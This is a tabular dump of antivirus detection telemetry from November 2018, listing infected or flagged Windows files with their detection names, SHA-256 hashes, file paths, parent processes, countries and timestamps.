  Row(detection=Row(filename='avscan-20181104-090426-63f892ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090426-63F892AE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243df', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243df', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380440, timestamp='2018-11-04T12:12:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T09:28:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-31T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-04T13:00:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:49:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163316-842cbf91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b317bd9c\\AVSCAN-20181104-163040-6D437984\\AVSCAN-20181104-163316-842CBF91', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:33:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dc1023.exe', filepath='C:\\RECYCLER\\S-1-5-21-1220945662-602162358-1417001333-500\\Dc1023.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:10:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:15:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:30:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:48:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225421-07bd88c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201403-72C9CBBB\\AVSCAN-20181104-225421-07BD88C3', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:54:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T03:55:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:25:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140317-f748f2a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140317-F748F2A3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='evernotenw.exe', filepath='C:\\Program Files (x86)\\Evernote\\Evernote\\NodeWebKit\\EvernoteNw.exe', filesize=42860000, name='W32/Parite.#M1.#R1'), hash='b23c9e88dcc9bbd593387bb828893dd0862454e39d73d7cdc22ecbd4c811f70f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:nw863Cpx0kaOWeCJ.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:56:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='04-b216031bc310v7', filepath='F:\\04-B216031BC310\\04-B216031BC310\\04-B216031BC310v7', filesize=192000, name='TR/Autorun.AI.#M1.#R1'), hash='00f732f908ef1308c666f9d87084b90aa6f7cb6d01adb5008acd1034588e6259', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\360\\360Safe\\safemon\\360tray.exe', parentsize=413256, timestamp='2018-11-04T13:45:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202724-683efbca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5c0c430\\AVSCAN-20181104-202655-64784597\\AVSCAN-20181104-202724-683EFBCA', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:27:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d471', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d471', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d92c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d92c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T18:03:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003440.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003440.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='d29f97f993d4abec4639ebf3be8ce9726dd5086eec9c14ae28829954e85d162b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015db79', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015db79', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204939-e73a1a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204939-E73A1A36', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:49:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skm_4050151222162800.doc', filepath='C:\\Users\\X\\AppData\\Local\\EdbMails\\2defbd4a818b221\\SKM_4050151222162800.doc', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M1.#R1'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\EdbMails\\edbmailspst64.exe', parentsize=554288, timestamp='2018-11-04T11:17:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tylO5IJZbUyVvd6n.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T07:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ws1a9193826455f5ff-6ab24494123382a9c4b-5908.htm', filepath='\\\\?\\D:\\Autodesk\\AutoCAD Structural Detailing 2012 - English\\Help\\filesACR\\WS1a9193826455f5ff-6ab24494123382a9c4b-5908.htm', filesize=244000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='585bf41ffecb6780a4f47d573d3dcaae445a73edab641685cf625408ab33e7a3', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:50:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211214-db72ece1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211214-DB72ECE1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102943-4fea8558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_828d9b0e\\AVSCAN-20181104-102926-4CA11A7B\\AVSCAN-20181104-102943-4FEA8558', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011759-01346479', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011759-01346479', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:15:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dev087.dll', filepath='\\\\?\\C:\\KSuite\\Dll\\DEV087.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='c7d85aae1817b833f66166e40f694b8d8683092c2837525b656ced4c8bc4ab51', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:32:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\NTBOOTAutoFix.exe", filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\DATA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e41b2c6c7ef4e6b36ce172589c39ef92ce0c73b6bf4b0e29a72be285a2f0ef42', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102044-a4fb6af1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102044-A4FB6AF1', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184326-1bee317f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47829443\\AVSCAN-20181102-183917-EDB97240\\AVSCAN-20181102-184326-1BEE317F', filesize=384000, name='Adware/AD.Zdengo.A.#M1.#R1'), hash='c76279310e007b844360eb7c0ebfae9a58e5bbf00aba5241503d4affb09d1d1b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ftx global vector configuration tool - copyx - copy2 - copy (4).exe', filepath='c:\\program files (x86)\\microsoft games\\microsoft flight simulator x\\orbx\\ftx_vector\\ftx global vector configuration tool - copyx - copy2 - copy (4).exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T06:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wptxcudr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wPtXcUdr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143944-8b552884', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27397bbd\\AVSCAN-20181102-143918-86A01940\\AVSCAN-20181102-143944-8B552884', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='c5fd1b2efaa7e9d5a2001ddd370ee233ee35b0a5b44042eb4dabdf8f7b3aa602', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105607-6a2cdd95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105607-6A2CDD95', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:07Z'), dt=datetime.date(2018, 11, 2)),
